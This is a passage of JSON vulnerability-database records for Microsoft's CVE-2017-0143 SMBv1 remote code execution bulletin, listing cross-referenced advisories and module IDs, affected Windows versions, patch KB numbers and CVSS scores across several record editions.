"AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
